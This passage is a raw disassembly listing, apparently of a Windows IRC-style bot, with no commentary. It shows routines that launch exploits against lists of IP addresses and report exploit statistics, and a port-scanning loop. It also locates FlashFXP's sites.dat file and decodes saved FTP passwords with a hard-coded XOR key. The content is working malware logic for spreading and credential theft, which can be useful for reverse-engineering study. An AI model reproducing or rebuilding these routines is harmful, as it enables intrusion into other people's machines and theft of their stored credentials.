; ---------------------------------------------------------------------------
loc_413F9A: ; CODE XREF: sub_413CB3+2E3�j
mov eax, [ebp+var_330]
cmp dword ptr [eax+4], 0
jz short loc_413FA8
jmp short loc_413FAD
; ---------------------------------------------------------------------------
loc_413FA8: ; CODE XREF: sub_413CB3+2F1�j
jmp loc_413D21
; ---------------------------------------------------------------------------
loc_413FAD: ; CODE XREF: sub_413CB3+2E5�j
; sub_413CB3+2F3�j
push [ebp+var_334]
push [ebp+var_484]
mov eax, [ebp+var_330]
push dword ptr [eax]
push offset dword_41CF8C
lea eax, [ebp+var_1AC]
push eax
call sub_40D53F
add esp, 14h
push [ebp+var_330]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_413CB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413FE7 proc near ; CODE XREF: sub_40A9CF+B5B�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_413FF3
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_413FF3: ; CODE XREF: sub_413FE7+8�j
push 327h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414009
jmp short locret_414050
; ---------------------------------------------------------------------------
loc_414009: ; CODE XREF: sub_413FE7+1E�j
push 180h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 184h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push offset aAttemptingToEx ; "Attempting to exploit IP's in list."
push 0
push [ebp+var_4]
push offset sub_413CB3
call sub_4095A4
add esp, 10h
locret_414050: ; CODE XREF: sub_413FE7+A�j
; sub_413FE7+20�j
leave
retn
sub_413FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414052 proc near ; DATA XREF: sub_41417D+35�o
var_3C0 = dword ptr -3C0h
var_3BC = byte ptr -3BCh
var_225 = byte ptr -225h
var_224 = byte ptr -224h
var_218 = byte ptr -218h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3C0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_3C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push offset aExploitStatist ; "Exploit statistics - "
lea eax, [ebp+var_200]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
and [ebp+var_204], 0
jmp short loc_4140A4
; ---------------------------------------------------------------------------
loc_414097: ; CODE XREF: sub_414052:loc_41414A�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
loc_4140A4: ; CODE XREF: sub_414052+43�j
mov eax, [ebp+var_204]
imul eax, 3Ah
movsx eax, ds:byte_41CD80[eax]
test eax, eax
jz loc_41414F
push 12h
mov eax, [ebp+var_204]
imul eax, 3Ah
add eax, offset byte_41CD80
push eax
lea eax, [ebp+var_218]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_218]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_218]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416B70 ; _mbscat
pop ecx
pop ecx
mov eax, [ebp+var_204]
imul eax, 3Ah
push ds:dword_41CDAA[eax]
push offset dword_41D054
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
lea eax, [ebp+eax+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
movsx eax, [ebp+var_225]
test eax, eax
jz short loc_41414A
mov eax, [ebp+var_204]
imul eax, 3Ah
and ds:dword_41CDAA[eax], 0
loc_41414A: ; CODE XREF: sub_414052+E6�j
jmp loc_414097
; ---------------------------------------------------------------------------
loc_41414F: ; CODE XREF: sub_414052+64�j
and [ebp+var_224], 0
lea eax, [ebp+var_200]
push eax
lea eax, [ebp+var_3BC]
push eax
call sub_40D53F
pop ecx
pop ecx
push [ebp+var_3C0]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_414052 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41417D proc near ; CODE XREF: sub_40A9CF+BF4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414197
jmp short locret_4141BF
; ---------------------------------------------------------------------------
loc_414197: ; CODE XREF: sub_41417D+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingExploit ; "Listing exploit statistics"
push 0
push [ebp+var_4]
push offset sub_414052
call sub_4095A4
add esp, 10h
locret_4141BF: ; CODE XREF: sub_41417D+18�j
leave
retn
sub_41417D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141C1 proc near ; DATA XREF: sub_4142BF+E2�o
var_2BC = dword ptr -2BCh
var_2B8 = byte ptr -2B8h
var_1B8 = byte ptr -1B8h
var_1B2 = dword ptr -1B2h
var_1AE = byte ptr -1AEh
var_16 = byte ptr -16h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2BCh
push 2B1h
push [ebp+arg_0]
lea eax, [ebp+var_2BC]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
call sub_416B64 ; clock
mov [ebp+var_4], eax
push [ebp+var_1B2]
push 0
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41424F
push [ebp+var_8]
call sub_4053B1
pop ecx
call sub_416B64 ; clock
sub eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D100
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 14h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41424F: ; CODE XREF: sub_4141C1+56�j
movsx eax, [ebp+var_16]
test eax, eax
jnz short loc_4142AD
call sub_416B64 ; clock
sub eax, [ebp+var_4]
cmp eax, [ebp+var_1B2]
jb short loc_41428B
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D0C8
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
jmp short loc_4142AD
; ---------------------------------------------------------------------------
loc_41428B: ; CODE XREF: sub_4141C1+A4�j
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_2B8]
push eax
push offset dword_41D098
lea eax, [ebp+var_1AE]
push eax
call sub_40D53F
add esp, 10h
loc_4142AD: ; CODE XREF: sub_4141C1+8C�j
; sub_4141C1+94�j ...
push [ebp+var_2BC]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_4141C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4142BF proc near ; CODE XREF: sub_40A9CF+1B5E�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_4], 0
jnz short loc_4142D0
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142D0: ; CODE XREF: sub_4142BF+A�j
cmp [ebp+arg_8], 0
jnz short loc_4142DD
mov [ebp+arg_8], offset a80 ; "80"
loc_4142DD: ; CODE XREF: sub_4142BF+15�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4142F8
cmp [ebp+var_8], 0FFFFh
jbe short loc_4142FD
loc_4142F8: ; CODE XREF: sub_4142BF+2E�j
jmp locret_4143AE
; ---------------------------------------------------------------------------
loc_4142FD: ; CODE XREF: sub_4142BF+37�j
cmp [ebp+arg_C], 0
jz short loc_414311
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_10], eax
jmp short loc_414318
; ---------------------------------------------------------------------------
loc_414311: ; CODE XREF: sub_4142BF+42�j
mov [ebp+var_10], 0EA60h
loc_414318: ; CODE XREF: sub_4142BF+50�j
mov eax, [ebp+var_10]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41432D
cmp [ebp+var_4], 36EE80h
jbe short loc_41432F
loc_41432D: ; CODE XREF: sub_4142BF+63�j
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_41432F: ; CODE XREF: sub_4142BF+6C�j
push 2B1h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_414345
jmp short locret_4143AE
; ---------------------------------------------------------------------------
loc_414345: ; CODE XREF: sub_4142BF+82�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_C]
add eax, 4
push eax
call sub_407A56
add esp, 0Ch
push 6
push [ebp+arg_8]
mov eax, [ebp+var_C]
add eax, 104h
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax+10Ah], ecx
push [ebp+arg_0]
mov eax, [ebp+var_C]
add eax, 10Eh
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+arg_8]
push [ebp+arg_4]
push offset dword_41D130
push 0
push [ebp+var_C]
push offset sub_4141C1
call sub_4095A4
add esp, 18h
locret_4143AE: ; CODE XREF: sub_4142BF+C�j
; sub_4142BF:loc_4142F8�j ...
leave
retn
sub_4142BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143B0 proc near ; DATA XREF: sub_414600+1D6�o
var_2E8 = qword ptr -2E8h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = byte ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = byte ptr -2CCh
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = byte ptr -2BCh
var_1BC = word ptr -1BCh
var_1BA = word ptr -1BAh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_18 = byte ptr -18h
var_C = word ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2DCh
push 2B3h
push [ebp+arg_0]
lea eax, [ebp+var_2C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov ax, [ebp+var_1BC]
mov [ebp+var_C], ax
push [ebp+var_1B4]
call sub_404D10
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_41440C
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
jmp locret_4145FC
; ---------------------------------------------------------------------------
loc_41440C: ; CODE XREF: sub_4143B0+47�j
push [ebp+var_1B4]
movzx eax, [ebp+var_1BA]
push eax
movzx eax, [ebp+var_1BC]
push eax
lea eax, [ebp+var_2BC]
push eax
mov eax, [ebp+var_2C0]
push dword ptr [eax]
push offset dword_41D1A0
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 1Ch
movsx eax, [ebp+var_18]
test eax, eax
jnz short loc_414458
push 3E8h
call ds:dword_41709C ; Sleep
loc_414458: ; CODE XREF: sub_4143B0+9B�j
call sub_416B64 ; clock
mov [ebp+var_2C4], eax
and [ebp+var_4], 0
loc_414467: ; CODE XREF: sub_4143B0+13A�j
; sub_4143B0+1F0�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jnz short loc_414482
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jle short loc_414487
loc_414482: ; CODE XREF: sub_4143B0+C1�j
jmp loc_4145A5
; ---------------------------------------------------------------------------
loc_414487: ; CODE XREF: sub_4143B0+D0�j
push 0Ah
lea eax, [ebp+var_2CC]
push eax
movzx eax, [ebp+var_C]
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+var_8]
push 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
call sub_404FE7
add esp, 0Ch
push eax
call sub_404D4D
pop ecx
pop ecx
mov [ebp+var_2D0], eax
mov ax, [ebp+var_C]
add ax, 1
mov [ebp+var_C], ax
cmp [ebp+var_2D0], 0
jz short loc_4144EF
movzx eax, [ebp+var_C]
movzx ecx, [ebp+var_1BA]
cmp eax, ecx
jg short loc_4144EF
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4144EF: ; CODE XREF: sub_4143B0+129�j
; sub_4143B0+138�j
push [ebp+var_1B8]
call ds:dword_41709C ; Sleep
push [ebp+var_8]
call sub_404E1C
pop ecx
test eax, eax
jz loc_414597
loc_41450C: ; CODE XREF: sub_4143B0+1E2�j
mov eax, [ebp+var_2C0]
cmp dword ptr [eax+4], 0
jz short loc_41451A
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_41451A: ; CODE XREF: sub_4143B0+166�j
push [ebp+var_8]
call sub_404F24
pop ecx
mov [ebp+var_2D8], eax
cmp [ebp+var_2D8], 0
jnz short loc_414534
jmp short loc_414597
; ---------------------------------------------------------------------------
loc_414534: ; CODE XREF: sub_4143B0+180�j
lea eax, [ebp+var_2CC]
push eax
push [ebp+var_2D8]
call sub_4045B2
pop ecx
pop ecx
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov al, [ebp+var_18]
mov [ebp+var_2D4], al
and [ebp+var_18], 0
lea eax, [ebp+var_2CC]
push eax
lea eax, [ebp+var_2BC]
push eax
push offset dword_41D18C
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 10h
mov al, [ebp+var_2D4]
mov [ebp+var_18], al
push 3E8h
call ds:dword_41709C ; Sleep
jmp loc_41450C
; ---------------------------------------------------------------------------
loc_414597: ; CODE XREF: sub_4143B0+156�j
; sub_4143B0+168�j ...
push [ebp+var_8]
call sub_404F7D
pop ecx
jmp loc_414467
; ---------------------------------------------------------------------------
loc_4145A5: ; CODE XREF: sub_4143B0:loc_414482�j
push [ebp+var_4]
call sub_416B64 ; clock
sub eax, [ebp+var_2C4]
mov [ebp+var_2DC], eax
fild [ebp+var_2DC]
fdiv ds:flt_417270
push ecx
push ecx
fstp [esp+2E8h+var_2E8]
lea eax, [ebp+var_2BC]
push eax
push offset unk_41D150
lea eax, [ebp+var_1B0]
push eax
call sub_40D53F
add esp, 18h
push [ebp+var_8]
call sub_404FD0
pop ecx
push [ebp+var_2C0]
call sub_409763
pop ecx
xor eax, eax
locret_4145FC: ; CODE XREF: sub_4143B0+57�j
leave
retn 4
sub_4143B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414600 proc near ; CODE XREF: sub_40A9CF+C9C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 0
jz short loc_414612
cmp [ebp+arg_8], 0
jnz short loc_414617
loc_414612: ; CODE XREF: sub_414600+A�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414617: ; CODE XREF: sub_414600+10�j
cmp [ebp+arg_C], 0
jnz short loc_414623
mov eax, [ebp+arg_8]
mov [ebp+arg_C], eax
loc_414623: ; CODE XREF: sub_414600+1B�j
push [ebp+arg_8]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_41463E
cmp [ebp+var_8], 0FFFFh
jbe short loc_414643
loc_41463E: ; CODE XREF: sub_414600+33�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414643: ; CODE XREF: sub_414600+3C�j
push [ebp+arg_C]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_41465E
cmp [ebp+var_14], 0FFFFh
jbe short loc_414663
loc_41465E: ; CODE XREF: sub_414600+53�j
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_414663: ; CODE XREF: sub_414600+5C�j
push 2B3h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41467C
jmp locret_4147E3
; ---------------------------------------------------------------------------
loc_41467C: ; CODE XREF: sub_414600+75�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jbe short loc_414696
mov eax, [ebp+var_14]
mov [ebp+var_18], eax
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov [ebp+var_8], eax
loc_414696: ; CODE XREF: sub_414600+82�j
cmp [ebp+arg_10], 0
jz short loc_4146AA
push [ebp+arg_10]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1C], eax
jmp short loc_4146B1
; ---------------------------------------------------------------------------
loc_4146AA: ; CODE XREF: sub_414600+9A�j
mov [ebp+var_1C], 7D0h
loc_4146B1: ; CODE XREF: sub_414600+A8�j
mov eax, [ebp+var_1C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4146C6
cmp [ebp+var_C], 0EA60h
jbe short loc_4146CD
loc_4146C6: ; CODE XREF: sub_414600+BB�j
mov [ebp+var_C], 7D0h
loc_4146CD: ; CODE XREF: sub_414600+C4�j
cmp [ebp+arg_14], 0
jz short loc_4146E1
push [ebp+arg_14]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_20], eax
jmp short loc_4146E8
; ---------------------------------------------------------------------------
loc_4146E1: ; CODE XREF: sub_414600+D1�j
mov [ebp+var_20], 100h
loc_4146E8: ; CODE XREF: sub_414600+DF�j
mov eax, [ebp+var_20]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4146FD
cmp [ebp+var_10], 200h
jbe short loc_414704
loc_4146FD: ; CODE XREF: sub_414600+F2�j
mov [ebp+var_10], 100h
loc_414704: ; CODE XREF: sub_414600+FB�j
push 100h
push [ebp+arg_4]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_416B58 ; strncpy
add esp, 0Ch
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_8]
mov [eax+104h], cx
mov eax, [ebp+var_4]
mov cx, word ptr [ebp+var_14]
mov [eax+106h], cx
cmp [ebp+var_C], 0EA60h
jbe short loc_414749
mov [ebp+var_24], 0EA60h
jmp short loc_41474F
; ---------------------------------------------------------------------------
loc_414749: ; CODE XREF: sub_414600+13E�j
mov eax, [ebp+var_C]
mov [ebp+var_24], eax
loc_41474F: ; CODE XREF: sub_414600+147�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_24]
mov [eax+108h], ecx
cmp [ebp+var_10], 200h
jbe short loc_41476D
mov [ebp+var_28], 200h
jmp short loc_414773
; ---------------------------------------------------------------------------
loc_41476D: ; CODE XREF: sub_414600+162�j
mov eax, [ebp+var_10]
mov [ebp+var_28], eax
loc_414773: ; CODE XREF: sub_414600+16B�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_28]
mov [eax+10Ch], ecx
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 110h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+10Ch]
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+106h]
push eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax+104h]
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
push offset dword_41D1E8
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_4143B0
call sub_4095A4
add esp, 20h
locret_4147E3: ; CODE XREF: sub_414600:loc_414612�j
; sub_414600:loc_41463E�j ...
leave
retn
sub_414600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147E5 proc near ; CODE XREF: sub_414A1E+373�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414816
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414816: ; CODE XREF: sub_4147E5+28�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
loc_41481E: ; CODE XREF: sub_4147E5:loc_4148BE�j
lea eax, [ebp+var_C]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414842
xor eax, eax
jmp locret_4148CC
; ---------------------------------------------------------------------------
loc_414842: ; CODE XREF: sub_4147E5+54�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
mov ecx, [ebp+var_C]
xor ecx, eax
mov [ebp+var_C], ecx
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
cmp eax, [ebp+var_C]
jl short loc_414866
mov eax, [ebp+var_C]
dec eax
mov [ebp+var_C], eax
loc_414866: ; CODE XREF: sub_4147E5+78�j
mov eax, [ebp+var_C]
sub eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
lea eax, [ebp+var_10]
push eax
push offset dword_418B54
push [ebp+arg_4]
call sub_416BA2 ; sscanf
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414899
xor eax, eax
jmp short locret_4148CC
; ---------------------------------------------------------------------------
loc_414899: ; CODE XREF: sub_4147E5+AE�j
mov eax, [ebp+arg_4]
inc eax
inc eax
mov [ebp+arg_4], eax
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148B2
mov [ebp+var_8], offset aYa36za48dehfrv ; "yA36zA48dEhfrvghGRg57h5UlDv3"
loc_4148B2: ; CODE XREF: sub_4147E5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4148BE
jmp short loc_4148C3
; ---------------------------------------------------------------------------
loc_4148BE: ; CODE XREF: sub_4147E5+D5�j
jmp loc_41481E
; ---------------------------------------------------------------------------
loc_4148C3: ; CODE XREF: sub_4147E5+D7�j
mov eax, [ebp+arg_0]
and byte ptr [eax], 0
push 1
pop eax
locret_4148CC: ; CODE XREF: sub_4147E5+2C�j
; sub_4147E5+58�j ...
leave
retn
sub_4147E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4148CE proc near ; CODE XREF: sub_414A1E+30�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
and [ebp+var_14], 0
lea eax, [ebp+var_14]
push eax
push 20019h
push 0
push offset aSoftwareClasse ; "SOFTWARE\\Classes\\Applications\\FlashFXP."...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
mov [ebp+var_10], eax
mov [ebp+var_4], 104h
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
push 0
push 0
push 0
push [ebp+var_14]
call ds:dword_41700C ; RegQueryValueExA
mov [ebp+var_10], eax
push [ebp+var_14]
call ds:dword_417028 ; RegCloseKey
cmp [ebp+var_10], 0
jnz short loc_414971
push offset aFlashfxp_exe1 ; "FlashFXP.exe %1"
push 4
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_414945
jmp loc_414A17
; ---------------------------------------------------------------------------
loc_414945: ; CODE XREF: sub_4148CE+70�j
push offset aSites_dat ; "sites.dat"
push [ebp+var_18]
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
mov eax, [ebp+var_18]
add eax, 0Fh
push eax
mov eax, [ebp+var_18]
add eax, 9
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push 1
pop eax
jmp locret_414A1C
; ---------------------------------------------------------------------------
loc_414971: ; CODE XREF: sub_4148CE+55�j
; sub_4148CE:loc_414A17�j
push 104h
push [ebp+arg_0]
push offset aProgramfiles ; "ProgramFiles"
call ds:dword_417104 ; GetEnvironmentVariableA
push offset aFlashfxpSites_ ; "\\FlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B70 ; _mbscat
pop ecx
pop ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4149B0
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_4149B0: ; CODE XREF: sub_4148CE+DB�j
mov eax, ds:dword_419398
mov [ebp+var_C], eax
loc_4149B8: ; CODE XREF: sub_4148CE+143�j
lea eax, [ebp+var_C]
push eax
call ds:dword_4170CC ; GetDriveTypeA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 5
jz short loc_414A02
cmp [ebp+var_1C], 2
jz short loc_414A02
lea eax, [ebp+var_C]
push eax
push offset aSflashfxpSites ; "%sFlashFXP\\sites.dat"
push [ebp+arg_0]
call sub_416B5E ; sprintf
add esp, 0Ch
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jz short loc_414A02
push 1
pop eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A02: ; CODE XREF: sub_4148CE+FB�j
; sub_4148CE+101�j ...
mov al, byte ptr [ebp+var_C]
add al, 1
mov byte ptr [ebp+var_C], al
movsx eax, byte ptr [ebp+var_C]
cmp eax, 5Ah
jnz short loc_4149B8
xor eax, eax
jmp short locret_414A1C
; ---------------------------------------------------------------------------
loc_414A17: ; CODE XREF: sub_4148CE+72�j
jmp loc_414971
; ---------------------------------------------------------------------------
locret_414A1C: ; CODE XREF: sub_4148CE+9E�j
; sub_4148CE+E0�j ...
leave
retn
sub_4148CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A1E proc near ; DATA XREF: sub_414EB0+35�o
var_5E0 = dword ptr -5E0h
var_5DC = dword ptr -5DCh
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = byte ptr -5C4h
var_544 = byte ptr -544h
var_4C4 = byte ptr -4C4h
var_444 = byte ptr -444h
var_3C4 = dword ptr -3C4h
var_3C0 = dword ptr -3C0h
var_3BC = dword ptr -3BCh
var_3B8 = dword ptr -3B8h
var_3B4 = byte ptr -3B4h
var_334 = dword ptr -334h
var_330 = byte ptr -330h
var_32C = dword ptr -32Ch
var_328 = byte ptr -328h
var_190 = byte ptr -190h
var_184 = dword ptr -184h
var_180 = byte ptr -180h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5E0h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_32C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_180]
push eax
call sub_4148CE
pop ecx
test eax, eax
jnz short loc_414A6B
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp locret_414EAC
; ---------------------------------------------------------------------------
loc_414A6B: ; CODE XREF: sub_414A1E+38�j
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D3B8
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 0Ch
and [ebp+var_184], 0
and [ebp+var_334], 0
mov al, [ebp+var_190]
mov [ebp+var_330], al
and [ebp+var_190], 0
push offset aRb ; "rb"
lea eax, [ebp+var_180]
push eax
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_3C4], eax
cmp [ebp+var_3C4], 0
jnz short loc_414ACF
jmp loc_414EAA
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_414A1E+AA�j
push 2
push 0
push [ebp+var_3C4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_3C4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_3C0], eax
cmp [ebp+var_3C0], 100000h
jnb short loc_414B0D
mov eax, [ebp+var_3C0]
mov [ebp+var_5E0], eax
jmp short loc_414B17
; ---------------------------------------------------------------------------
